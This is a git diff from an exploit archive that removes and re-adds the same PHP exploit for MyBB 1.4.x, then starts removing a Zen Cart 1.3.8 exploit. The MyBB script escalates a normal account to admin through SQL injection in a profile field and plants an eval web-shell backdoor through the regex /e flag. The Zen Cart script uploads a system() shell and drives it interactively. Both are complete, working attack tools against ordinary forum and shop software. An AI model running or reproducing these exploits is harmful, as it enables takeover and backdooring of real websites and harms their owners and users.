-		$this->ip	= '67.167.124.135';
-		$this->ua	= 'Mozilla 5.0';
-		$this->bckdr	= '/cache/themes/themes.php';
-
-		if ($this->get_argv('--help') !== False || $this->get_argv('-h') !== False)	$this->help();
-		if (!$this->user || !$this->pass)						die ("You have to insert User/Password\r\nUse --help or -h for more informations.\r\n");
-		if (!$this->target)								die ("You have to insert Target\r\nUse --help or -h for more informations.\r\n");
-			
-		$this->http();
-		$this->init();
-
-			
-	}
-
-	function help ()
-	{
-
-		die ("Under Construction\r\n");
-
-	}
-
-	function get_argv ($what)
-	{
-		global $argv;
-
-		if (!$n = array_search($what, $argv)) return False;
-		return $argv[$n+1];	
-	}
-
-	function init ()
-	{
-
-		set_time_limit(0); // about 30 seconds left? Be serious.
-
-		echo "[.] Initialing.\r\n";
-
-			if (!$this->mybbuser = $this->ilovecookies ()) die ("Incorrect credentials.\r\n");
-
-		echo "[+] Logged in.\r\n";
-
-			if (!$this->mypostkey = $this->getmypostkey())  die ("My_Post_Key Not Found.\r\n");
-
-		echo "[+] my_post_key variable found.\r\n";
-
-			$this->hidemefromonlinelist();
-
-		echo "[+] Turned On mybb's invisible mode.\r\n";
-
-			$this->user2admin();
-
-		echo "[+] Sql code injected. You're now admin.\r\n";
-
-			if (!$this->admindir && !$this->admindir = $this->findadmindir()) die ("Unable to find admin Dir.\r\nWhatever it's possible your user is currently an administrator.\r\nIf you know admin dir path, you may use --admindir\r\n");
-
-		echo "[+] Admindir found (or --admindir is used): {$this->admindir}.\r\n";		
-
-			if (!$this->adminsid = $this->loginadmin())  die ("[-] Unable to login as admin.\r\nWhatever it's possible your user is currently an administrator.\r\n");
-		
-		echo "[+] Admin sid Found: {$this->adminsid}\r\n";		
-			#$this->writabledirs();
-			$this->rce ();		
-			if (!$this->checkrce ()) die ("Unable to Execute PHP Code.\r\nWhatever it's possible your user is currently an administrator.\r\n");
-
-		echo "[+] Site correctly backdoored.\r\n";
-
-			$this->admin2user();
-
-		echo "[+] Sql code injected. You're now user.\r\n";
-		echo "[+] Backdoor URI: {$this->target}{$this->bckdr}\r\n";
-		echo "All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.\r\nHave a nice day :P\r\n\r\n";
-
-	}	
-
-	function ilovecookies ()
-	{
-		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua);
-		$this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'submit' => 'Login', 'action' => 'do_login');
-		
-		$rsp = $this->post ("{$this->target}/member.php");
-		
-		if (!preg_match_all ('~mybbuser=(.+?);~',$rsp,$res)) return False;
-
-		return $res[1][0];
-		
-
-	}
-
-	function getmypostkey ()
-	{
-
-		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/member.php", 'Cookie' => "mybbuser={$this->mybbuser};");
-		$rsp = $this->get ("{$this->target}/usercp.php?action=profile");
-
-		if (!preg_match_all ('~name="my_post_key" value="(.+?)" />~',$rsp,$res)) return False;
-
-		return $res[1][0];				
-
-	}
-
-	function hidemefromonlinelist()
-
-	{
-		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
-		$this->postdata = array ('my_post_key' => $this->mypostkey, 'invisible' => '1', 'action' => 'do_options', 'regsubmit' => 'Update+Options');
-		
-		$rsp = $this->post ("{$this->target}/member.php");
-		
-	}
-
-	function user2admin ()
-
-	{
-
-		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
-		$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
-					'invisible'			=> '1', 
-					'bday1'				=> '', 
-					'bday2'				=> '', 
-					'bday3'				=> '', 
-					'website'			=> 'http%3A%2F%2F', 
-					'profile_fields%5Bfid3%5D'	=> 'Undisclosed', 
-					'profile_fields%5Bfid2%5D'	=> 'Undisclosed',
-					'profile_fields%5Bfid1%5D'	=> 'Undisclosed', 
-					'usertitle'			=> '',
-					'icq'				=> '', 
-					'aim'				=> '', 
-					'msn'				=> '', 
-					'yahoo'				=> '', 
-					'away'				=> '0', 
-					'awayreason'			=> '', 
-					'awayday'			=> '', 
-					'awaymonth'			=> '',
-					'awayyear'			=> '',
-					'birthdayprivacy'		=> "all', usergroup=4, email='pr3sident@whit3house.gov',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='",
-					'action'			=> 'do_profile', 
-					'regsubmit'			=> '1');
-
-		$rsp = $this->post ("{$this->target}/usercp.php");
-
-	}
-	
-	function findadmindir ()
-	{
-
-		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
-		$rsp = $this->get("{$this->target}/index.php");
-
-
-		if (!preg_match_all ("~<!-- start: header_welcomeblock_member_admin -->
- — <a href=\"{$this->target}(.+?)/index.php\">~",$rsp,$res)) return False;
-
-		return $res[1][0];				
-
-
-
-	}
-
-	function loginadmin ()
-
-	{
-		
-		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
-		$this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'do' => 'login');
-
-		$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php");
-		
-		if (!preg_match_all ('~adminsid=(.+?);~',$rsp,$res)) return False;
-
-		return $res[1][0];
-	}
-
-	function writabledirs ()
-	{
-		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/{$this->admindir}/index.php?", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
-		$this->get ("{$this->target}/{$this->admindir}/index.php?module=tools") ;
-
-
-	}
-
-
-	function rceOld ()
-
-	{
-
-	//edits inc/functions.php (original one)
-
-	$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
-	$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
-					'o_o'				=> 'phpinfo();', 
-					'regex'				=> '(.*%3F)#e%00', 
-					'replacement'			=> 'die(eval(stripslashes($_REQUEST[\'o_o\'])));', 
-					'test_value'			=> 'XoD');
-
-	$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
-
-
-	}
-
-	function rce ()
-
-	{
-
-	$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
-	$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
-					'o_o'				=> 'JGZwID0gZm9wZW4oJF9SRVFVRVNUWydmaWxlJ10sICdhJyk7DQpmd3JpdGUoJGZwLCAnPD9QSFAgaWYgKGlzc2V0KCRfUkVRVUVTVFt4XSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFt4XSkpOyA/PicpOw0KZmNsb3NlKCRmcCk7', 
-					'regex'				=> '(.*%3F)#e%00', 
-					'replacement'			=> 'die(eval(base64_decode($_REQUEST[\'o_o\'])));', 
-					'test_value'			=> 'XoD',
-					'file'				=> "../{$this->bckdr}");
-
-	$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
-
-
-	}
-
-
-	function admin2user ()
-	
-	{
-
-		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
-		$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
-					'invisible'			=> '1', 
-					'bday1'				=> '', 
-					'bday2'				=> '', 
-					'bday3'				=> '', 
-					'website'			=> 'http%3A%2F%2F', 
-					'profile_fields%5Bfid3%5D'	=> 'Undisclosed', 
-					'profile_fields%5Bfid2%5D'	=> 'Undisclosed',
-					'profile_fields%5Bfid1%5D'	=> 'Undisclosed', 
-					'usertitle'			=> '',
-					'icq'				=> '', 
-					'aim'				=> '', 
-					'msn'				=> '', 
-					'yahoo'				=> '', 
-					'away'				=> '0', 
-					'awayreason'			=> '', 
-					'awayday'			=> '', 
-					'awaymonth'			=> '',
-					'awayyear'			=> '',
-					'birthdayprivacy'		=> "all', usergroup=2, email='pr3sident.whit3house@gmail.com',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='",
-					'action'			=> 'do_profile', 
-					'regsubmit'			=> '1');
-
-		$rsp = $this->post ("{$this->target}/usercp.php");
-
-	}
-
-	function checkrce_old ()
-
-	{
-		$this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;');
-		$rsp = $this->get ("{$this->target}/{$this->admindir}/inc/functions.php?");
-
-		if (!strstr($rsp,'.:31337:.'))	return False;
-		else				return True;
-
-	}
-
-	function checkrce ()
-
-	{
-		$this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;');
-		$rsp = $this->get ("{$this->target}/{$this->bckdr}");
-
-		if (!strstr($rsp,'.:31337:.'))	return False;
-		else				return True;
-
-	}
-
-
-	function http ($port = 80, $header = array(), $post = array(), $timeout = 30)
-	{
-
-		$this->port	= $port;
-		$this->timeout	= $timeout;
-		$this->header	= $header;
-		$this->postdata	= $post;
-	}
-
-	function get ($url)
-	{
-		$this->url = parse_url($url);
-		$this->packet = array();
-
-		$this->packet[] = "GET {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1";
-		$this->packet[] = "Host: {$this->url['host']}";
-
-		foreach ($this->header as $header => $value)
-		{
-			$this->packet[] = "$header: $value";
-		}
-		
-		$this->packet[] = "\r\n\r\n"; 
-		$this->packet	= implode ("\r\n",$this->packet);
-
-		return $this->conn();
-	}
-
-	function post ($url)
-	{
-		$this->url = parse_url($url);
-
-		$this->packet = array();
-		$this->postcontent = '';
-
-		$this->packet[] = "POST {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1";
-		$this->packet[] = "Host: {$this->url['host']}";
-
-		foreach ($this->header as $header => $value)
-		{
-			$this->packet[] = "$header: $value";
-		}
-	
-		foreach ($this->postdata as $post => $value)
-		{
-			if ($this->postcontent != '') $this->postcontent .= '&'; 
-			$this->postcontent .= "$post=$value";
-		}
-	
-		$this->packet[] = 'Content-Type: application/x-www-form-urlencoded';
-		$this->packet[] = "Content-Length: ".strlen($this->postcontent)."\r\n";
-		$this->packet[] = $this->postcontent;
-
-		$this->packet	= implode ("\r\n",$this->packet);
-
-		return $this->conn();
-	}
-
-
-	function conn()
-	{
-		if (!isset($this->url['port']))	$this->url['port'] = $this->port;
-
-		$sk = fsockopen ($this->url['host'], $this->url['port'], $eno, $estr, $this->timeout);
-
-		if (!is_resource($sk))	return "[-] Fsockopen Failed! Error: ".$estr." [".$eno."]" ;
-
-		else	{
-
-    				fputs($sk, $this->packet);
-				$rsp = "";
-				
-				while (!feof($sk)) 
-					{
-	       					$rsp .= fgets ($sk, 1024);
-					}
-			}
-
-		fclose($sk);
-		return $rsp;
-	}
-
-
-
-}
-
-
-
-
-?>
-
-# milw0rm.com [2009-06-22]
+<?PHP
+/*
+
+Someone decided to contact mybb's staff informing about this vulnerability with the obvious result that this will not work anymore. 
+Fucking moron.
+
+I'm releasing a non-finished version of the exploit. No help, PoC and with the necessity of --admindir flag.
+Going to update it in the next days.
+For historical reason, i'm leaving the original title, but note that is <= 1.4.6
+
+
+Example:
+
+paradox@d3b14n:~/Files/Exploit-Pocs/My_Exploit/Remote/Mybb$ php myBBtomilw0rm.php -u anybody -p qwerty -t http://localhost/web/mybb/Upload/ --admindir /admin/
+[.] Initialing.
+[+] Logged in.
+[+] my_post_key variable found.
+[+] Turned On mybb's invisible mode.
+[+] Sql code injected. You're now admin.
+[+] Admindir found (or --admindir is used): /admin/.
+[+] Admin sid Found: 824e26b4221673a0f213c37f87b9ccd7
+[+] Site correctly backdoored.
+[+] Sql code injected. You're now user.
+[+] Backdoor URI: http://localhost/web/mybb/Upload//cache/themes/themes.php
+All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.
+Have a nice day :P
+
+
+For the curious people: http://mybboard.it/forum/thread-3623.html
+
+*/
+
+/*
+
+Mybb <= 1.4.4 Remote Code Execution through Sql Injection Exploit
+
+
+Discovered: 	About 4 days before the exploit was coded.
+Coded:		03-03-2009 
+Author:		The:Paradox
+Release:	Not yet. 
+
+No php.ini setting can stop us ! =O 
+A user (not email confirmed too) is needed.
+
+Keep private or your keyboard will blew up.
+
+
+*/
+
+
+$mybb = new maibibi2;
+
+
+class maibibi2 
+{
+
+	function __construct ()
+	{
+
+
+
+		$this->user	= $this->get_argv('-u');
+		$this->pass	= $this->get_argv('-p');
+		$this->target	= $this->get_argv('-t');
+		$this->admindir	= $this->get_argv('--admindir');	
+		$this->oa2u	= $this->get_argv('--onlyadmin2user');
+
+		$this->ip	= '67.167.124.135';
+		$this->ua	= 'Mozilla 5.0';
+		$this->bckdr	= '/cache/themes/themes.php';
+
+		if ($this->get_argv('--help') !== False || $this->get_argv('-h') !== False)	$this->help();
+		if (!$this->user || !$this->pass)						die ("You have to insert User/Password\r\nUse --help or -h for more informations.\r\n");
+		if (!$this->target)								die ("You have to insert Target\r\nUse --help or -h for more informations.\r\n");
+			
+		$this->http();
+		$this->init();
+
+			
+	}
+
+	function help ()
+	{
+
+		die ("Under Construction\r\n");
+
+	}
+
+	function get_argv ($what)
+	{
+		global $argv;
+
+		if (!$n = array_search($what, $argv)) return False;
+		return $argv[$n+1];	
+	}
+
+	function init ()
+	{
+
+		set_time_limit(0); // about 30 seconds left? Be serious.
+
+		echo "[.] Initialing.\r\n";
+
+			if (!$this->mybbuser = $this->ilovecookies ()) die ("Incorrect credentials.\r\n");
+
+		echo "[+] Logged in.\r\n";
+
+			if (!$this->mypostkey = $this->getmypostkey())  die ("My_Post_Key Not Found.\r\n");
+
+		echo "[+] my_post_key variable found.\r\n";
+
+			$this->hidemefromonlinelist();
+
+		echo "[+] Turned On mybb's invisible mode.\r\n";
+
+			$this->user2admin();
+
+		echo "[+] Sql code injected. You're now admin.\r\n";
+
+			if (!$this->admindir && !$this->admindir = $this->findadmindir()) die ("Unable to find admin Dir.\r\nWhatever it's possible your user is currently an administrator.\r\nIf you know admin dir path, you may use --admindir\r\n");
+
+		echo "[+] Admindir found (or --admindir is used): {$this->admindir}.\r\n";		
+
+			if (!$this->adminsid = $this->loginadmin())  die ("[-] Unable to login as admin.\r\nWhatever it's possible your user is currently an administrator.\r\n");
+		
+		echo "[+] Admin sid Found: {$this->adminsid}\r\n";		
+			#$this->writabledirs();
+			$this->rce ();		
+			if (!$this->checkrce ()) die ("Unable to Execute PHP Code.\r\nWhatever it's possible your user is currently an administrator.\r\n");
+
+		echo "[+] Site correctly backdoored.\r\n";
+
+			$this->admin2user();
+
+		echo "[+] Sql code injected. You're now user.\r\n";
+		echo "[+] Backdoor URI: {$this->target}{$this->bckdr}\r\n";
+		echo "All Done. The:Paradox hopes you used this exploit exclusively for your own fun and you enjoyed it.\r\nHave a nice day :P\r\n\r\n";
+
+	}	
+
+	function ilovecookies ()
+	{
+		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua);
+		$this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'submit' => 'Login', 'action' => 'do_login');
+		
+		$rsp = $this->post ("{$this->target}/member.php");
+		
+		if (!preg_match_all ('~mybbuser=(.+?);~',$rsp,$res)) return False;
+
+		return $res[1][0];
+		
+
+	}
+
+	function getmypostkey ()
+	{
+
+		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/member.php", 'Cookie' => "mybbuser={$this->mybbuser};");
+		$rsp = $this->get ("{$this->target}/usercp.php?action=profile");
+
+		if (!preg_match_all ('~name="my_post_key" value="(.+?)" />~',$rsp,$res)) return False;
+
+		return $res[1][0];				
+
+	}
+
+	function hidemefromonlinelist()
+
+	{
+		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
+		$this->postdata = array ('my_post_key' => $this->mypostkey, 'invisible' => '1', 'action' => 'do_options', 'regsubmit' => 'Update+Options');
+		
+		$rsp = $this->post ("{$this->target}/member.php");
+		
+	}
+
+	function user2admin ()
+
+	{
+
+		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
+		$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
+					'invisible'			=> '1', 
+					'bday1'				=> '', 
+					'bday2'				=> '', 
+					'bday3'				=> '', 
+					'website'			=> 'http%3A%2F%2F', 
+					'profile_fields%5Bfid3%5D'	=> 'Undisclosed', 
+					'profile_fields%5Bfid2%5D'	=> 'Undisclosed',
+					'profile_fields%5Bfid1%5D'	=> 'Undisclosed', 
+					'usertitle'			=> '',
+					'icq'				=> '', 
+					'aim'				=> '', 
+					'msn'				=> '', 
+					'yahoo'				=> '', 
+					'away'				=> '0', 
+					'awayreason'			=> '', 
+					'awayday'			=> '', 
+					'awaymonth'			=> '',
+					'awayyear'			=> '',
+					'birthdayprivacy'		=> "all', usergroup=4, email='pr3sident@whit3house.gov',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='",
+					'action'			=> 'do_profile', 
+					'regsubmit'			=> '1');
+
+		$rsp = $this->post ("{$this->target}/usercp.php");
+
+	}
+	
+	function findadmindir ()
+	{
+
+		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
+		$rsp = $this->get("{$this->target}/index.php");
+
+
+		if (!preg_match_all ("~<!-- start: header_welcomeblock_member_admin -->
+ — <a href=\"{$this->target}(.+?)/index.php\">~",$rsp,$res)) return False;
+
+		return $res[1][0];				
+
+
+
+	}
+
+	function loginadmin ()
+
+	{
+		
+		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
+		$this->postdata = array ('username' => $this->user, 'password' => $this->pass, 'do' => 'login');
+
+		$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php");
+		
+		if (!preg_match_all ('~adminsid=(.+?);~',$rsp,$res)) return False;
+
+		return $res[1][0];
+	}
+
+	function writabledirs ()
+	{
+		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/{$this->admindir}/index.php?", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
+		$this->get ("{$this->target}/{$this->admindir}/index.php?module=tools") ;
+
+
+	}
+
+
+	function rceOld ()
+
+	{
+
+	//edits inc/functions.php (original one)
+
+	$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
+	$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
+					'o_o'				=> 'phpinfo();', 
+					'regex'				=> '(.*%3F)#e%00', 
+					'replacement'			=> 'die(eval(stripslashes($_REQUEST[\'o_o\'])));', 
+					'test_value'			=> 'XoD');
+
+	$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
+
+
+	}
+
+	function rce ()
+
+	{
+
+	$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=edit&cid=1", 'Cookie' => "mybbuser={$this->mybbuser}; adminsid={$this->adminsid};");
+	$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
+					'o_o'				=> 'JGZwID0gZm9wZW4oJF9SRVFVRVNUWydmaWxlJ10sICdhJyk7DQpmd3JpdGUoJGZwLCAnPD9QSFAgaWYgKGlzc2V0KCRfUkVRVUVTVFt4XSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFt4XSkpOyA/PicpOw0KZmNsb3NlKCRmcCk7', 
+					'regex'				=> '(.*%3F)#e%00', 
+					'replacement'			=> 'die(eval(base64_decode($_REQUEST[\'o_o\'])));', 
+					'test_value'			=> 'XoD',
+					'file'				=> "../{$this->bckdr}");
+
+	$rsp = $this->post ("{$this->target}/{$this->admindir}/index.php?module=config/mycode&action=xmlhttp_test_mycode");
+
+
+	}
+
+
+	function admin2user ()
+	
+	{
+
+		$this->header = array ('client-ip' => $this->ip ,'User-Agent' => $this->ua, 'Referer' => "{$this->target}/usercp.php?action=profile", 'Cookie' => "mybbuser={$this->mybbuser};");
+		$this->postdata = array ('my_post_key'			 => $this->mypostkey, 
+					'invisible'			=> '1', 
+					'bday1'				=> '', 
+					'bday2'				=> '', 
+					'bday3'				=> '', 
+					'website'			=> 'http%3A%2F%2F', 
+					'profile_fields%5Bfid3%5D'	=> 'Undisclosed', 
+					'profile_fields%5Bfid2%5D'	=> 'Undisclosed',
+					'profile_fields%5Bfid1%5D'	=> 'Undisclosed', 
+					'usertitle'			=> '',
+					'icq'				=> '', 
+					'aim'				=> '', 
+					'msn'				=> '', 
+					'yahoo'				=> '', 
+					'away'				=> '0', 
+					'awayreason'			=> '', 
+					'awayday'			=> '', 
+					'awaymonth'			=> '',
+					'awayyear'			=> '',
+					'birthdayprivacy'		=> "all', usergroup=2, email='pr3sident.whit3house@gmail.com',regip='79.140.81.83', longregip='1334595923', lastip='', longlastip='",
+					'action'			=> 'do_profile', 
+					'regsubmit'			=> '1');
+
+		$rsp = $this->post ("{$this->target}/usercp.php");
+
+	}
+
+	function checkrce_old ()
+
+	{
+		$this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;');
+		$rsp = $this->get ("{$this->target}/{$this->admindir}/inc/functions.php?");
+
+		if (!strstr($rsp,'.:31337:.'))	return False;
+		else				return True;
+
+	}
+
+	function checkrce ()
+
+	{
+		$this->header = array ('client-ip' => $this->ip ,'Cookie' => 'x=print \'.:31337:.\'%3B;');
+		$rsp = $this->get ("{$this->target}/{$this->bckdr}");
+
+		if (!strstr($rsp,'.:31337:.'))	return False;
+		else				return True;
+
+	}
+
+
+	function http ($port = 80, $header = array(), $post = array(), $timeout = 30)
+	{
+
+		$this->port	= $port;
+		$this->timeout	= $timeout;
+		$this->header	= $header;
+		$this->postdata	= $post;
+	}
+
+	function get ($url)
+	{
+		$this->url = parse_url($url);
+		$this->packet = array();
+
+		$this->packet[] = "GET {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1";
+		$this->packet[] = "Host: {$this->url['host']}";
+
+		foreach ($this->header as $header => $value)
+		{
+			$this->packet[] = "$header: $value";
+		}
+		
+		$this->packet[] = "\r\n\r\n"; 
+		$this->packet	= implode ("\r\n",$this->packet);
+
+		return $this->conn();
+	}
+
+	function post ($url)
+	{
+		$this->url = parse_url($url);
+
+		$this->packet = array();
+		$this->postcontent = '';
+
+		$this->packet[] = "POST {$this->url['path']}?{$this->url['query']}{$this->url['fragment']} HTTP/1.1";
+		$this->packet[] = "Host: {$this->url['host']}";
+
+		foreach ($this->header as $header => $value)
+		{
+			$this->packet[] = "$header: $value";
+		}
+	
+		foreach ($this->postdata as $post => $value)
+		{
+			if ($this->postcontent != '') $this->postcontent .= '&'; 
+			$this->postcontent .= "$post=$value";
+		}
+	
+		$this->packet[] = 'Content-Type: application/x-www-form-urlencoded';
+		$this->packet[] = "Content-Length: ".strlen($this->postcontent)."\r\n";
+		$this->packet[] = $this->postcontent;
+
+		$this->packet	= implode ("\r\n",$this->packet);
+
+		return $this->conn();
+	}
+
+
+	function conn()
+	{
+		if (!isset($this->url['port']))	$this->url['port'] = $this->port;
+
+		$sk = fsockopen ($this->url['host'], $this->url['port'], $eno, $estr, $this->timeout);
+
+		if (!is_resource($sk))	return "[-] Fsockopen Failed! Error: ".$estr." [".$eno."]" ;
+
+		else	{
+
+    				fputs($sk, $this->packet);
+				$rsp = "";
+				
+				while (!feof($sk)) 
+					{
+	       					$rsp .= fgets ($sk, 1024);
+					}
+			}
+
+		fclose($sk);
+		return $rsp;
+	}
+
+
+
+}
+
+
+
+
+?>
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/9004.txt b/platforms/php/webapps/9004.txt
index f7bdf85e0..035e27a5b 100755
--- a/platforms/php/webapps/9004.txt
+++ b/platforms/php/webapps/9004.txt
@@ -1,734 +1,734 @@
-#!/usr/bin/php
-<?php
-
-#
-# ------- Zen Cart 1.3.8 Remote Code Execution
-# http://www.zen-cart.com/
-# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
-# A new version (1.3.8a)  is avaible on http://www.zen-cart.com/
-#
-# BlackH :)
-#
-
-error_reporting(E_ALL ^ E_NOTICE);
-if($argc < 2)
-{
-echo "
-=___________ Zen Cart 1.3.8 Remote Code Execution Exploit  ____________=
-========================================================================
-|                  BlackH <Bl4ck.H@gmail.com>                          |
-========================================================================
-|                                                                      |
-| \$system> php $argv[0] <url>                                        |
-| Notes: <url>      ex: http://victim.com/site (no slash)              |
-|                                                                      |
-========================================================================
-";exit(1);
-}
-
-
-$url = $argv[1];
-$trick = "/password_forgotten.php";
-
-$xpl = new phpsploit();
-$xpl->agent("Mozilla Firefox");
-
-$real_kthxbye = remote_exec($url);
-
-# Remote Code Execution Exploit
-function remote_exec($url) {
-	global $xpl, $url, $trick;
-	
-	echo "\n[-] Remote Code Execution";
-
-	if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n");
-	
-	$n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
-	$code = '<?php system($_SERVER["HTTP_SHELL"]); ?>';
-	
-	$form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
-			"record_company_name" => "0",
-			"record_company_image" => array(frmdt_type => "tgreal/suce", # it works ! o_O
-											frmdt_filename => $n,
-											frmdt_content => $code));
-
-	if($xpl->formdata($form)) echo "\n[!] Done - Start Shell: ".$n;
-	else die("\n[!] error - can't upload the shell\n");
-
-	print "\nrce@jah\$> ";
-
-	while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))){
-		$xpl->addheader('SHELL',$cmd);
-		$xpl->get($url.'/images/'.$n);	
-		print $xpl->getcontent()."\nrce@jah$> ";
-		# don't forget to "rm *.php" and exit
-		# you can use "Zen Cart 1.3.8 Remote SQL Execution Exploit" 
-		#  to clean the database (record_company & record_company_info)
-	}
-}
-
-/*
- * 
- * Copyright (C) darkfig
- * 
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- * 
- * TITLE:          PhpSploit Class
- * REQUIREMENTS:   PHP 4 / PHP 5
- * VERSION:        2.0
- * LICENSE:        GNU General Public License
- * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
- * FILENAME:       phpsploitclass.php
- *
- * CONTACT:        gmdarkfig@gmail.com (french / english)
- * GREETZ:         Sparah, Ddx39
- *
- * DESCRIPTION:
- * The phpsploit is a class implementing a web user agent.
- * You can add cookies, headers, use a proxy server with (or without) a
- * basic authentification. It supports the GET and the POST method. It can
- * also be used like a browser with the cookiejar() function (which allow
- * a server to add several cookies for the next requests) and the
- * allowredirection() function (which allow the script to follow all
- * redirections sent by the server). It can return the content (or the
- * headers) of the request. Others useful functions can be used for debugging.
- * A manual is actually in development but to know how to use it, you can
- * read the comments.
- *
- * CHANGELOG:
- *
- * [2007-06-10] (2.0)
- *  * Code: Code optimization
- *  * New: Compatible with PHP 4 by default
- *
- * [2007-01-24] (1.2)
- *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
- *  * New: multipart/form-data enctype is now supported 
- *
- * [2006-12-31] (1.1)
- *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
- *  * New: You can now call the getheader() / getcontent() function without parameters
- *
- * [2006-12-30] (1.0)
- *  * First version
- * 
- */
-
-class phpsploit
-{
-	var $proxyhost;
-	var $proxyport;
-	var $host;
-	var $path;
-	var $port;
-	var $method;
-	var $url;
-	var $packet;
-	var $proxyuser;
-	var $proxypass;
-	var $header;
-	var $cookie;
-	var $data;
-	var $boundary;
-	var $allowredirection;
-	var $last_redirection;
-	var $cookiejar;
-	var $recv;
-	var $cookie_str;
-	var $header_str;
-	var $server_content;
-	var $server_header;
-	
-
-	/**
-	 * This function is called by the
-	 * get()/post()/formdata() functions.
